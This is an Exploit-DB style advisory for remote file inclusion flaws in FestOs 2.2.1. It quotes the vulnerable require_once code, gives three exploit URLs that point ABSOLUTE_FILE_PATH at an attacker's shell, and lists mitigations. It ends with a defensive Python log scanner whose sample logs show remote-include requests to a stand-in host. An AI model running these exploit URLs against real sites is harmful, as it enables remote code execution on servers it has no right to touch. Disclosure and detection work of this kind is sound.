vendor:
FestOs
by:
cr4wl3r
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: FestOs
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: GNU/Linux
2009

FestOs <= 2.2.1 Multiple RFI Exploit

FestOs version 2.2.1 is vulnerable to multiple Remote File Inclusion (RFI) flaws. The ABSOLUTE_FILE_PATH value that several scripts pass to require_once can be supplied by the client, so an attacker can include a file from a remote server, leading to arbitrary code execution on the web server.

Mitigation:

To mitigate this vulnerability, update FestOs to a secure version or apply any available patches. Additionally, ensure that the ABSOLUTE_FILE_PATH parameter is properly sanitized and validated: it should be set from the application's own configuration, never taken from request input, and checked to be a local directory path. Setting allow_url_include=Off in php.ini stops include/require from loading remote URLs and blocks this class of RFI even if the parameter is still attacker-controlled.

Exploit-DB raw data:

##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit          ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/festos/downloads/list##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################

~ Code : [reports_placement.php]

<?php 
$title = "Jury Sheet Report";

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
   header("Location:index.php");
}
include "includes/reportheader.php";
?>


~ 3xplo!t :

[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]


~ Code : [FestOS.php]

require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");


~ 3xplo!t :

[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]



~ Code : [reportheader.php]

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');


~ 3xplo!t :

[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]


and more...
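As an added defender-side example (not part of the original advisory), the following Python scans web server access logs for the request pattern shown above: any request to a FestOs script carrying an ABSOLUTE_FILE_PATH query parameter, rated high when the value carries a URL scheme (the RFI case) and medium otherwise. The log lines, IP addresses and paths are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Dec/2009:10:01:12 +0000] "GET /festos/admin/reports_placement.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Dec/2009:10:01:13 +0000] "GET /festos/admin/reports_placement.php?ABSOLUTE_FILE_PATH=http://203.0.113.9/x.txt HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.8 - - [19/Dec/2009:10:02:40 +0000] "GET /festos/core/FestOS.php?ABSOLUTE_FILE_PATH=%68ttp%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 500 0 "-" "curl/7.19"
198.51.100.9 - - [19/Dec/2009:10:03:01 +0000] "GET /festos/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=/var/www/festos/ HTTP/1.1" 200 10 "-" "curl/7.19"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# ABSOLUTE_FILE_PATH is an internal configuration key; a legitimate browser never sends it.
# A value starting with a URL scheme (http:, ftp:, ...) is the remote-inclusion pattern.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)


def classify(line):
    """Return (severity, ip, path, value) for a suspicious request, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # parse_qs percent-decodes once, exactly as PHP does when filling $_GET.
    params = parse_qs(target.query, keep_blank_values=True)
    if "ABSOLUTE_FILE_PATH" not in params:
        return None
    value = params["ABSOLUTE_FILE_PATH"][0]
    severity = "high" if SCHEME_RE.match(value) else "medium"
    return severity, m.group("ip"), target.path, value


def scan(log_text):
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for severity, ip, path, value in scan(SAMPLE_LOG):
        print(f"{severity:6} {ip:14} {path} ABSOLUTE_FILE_PATH={value!r}")
```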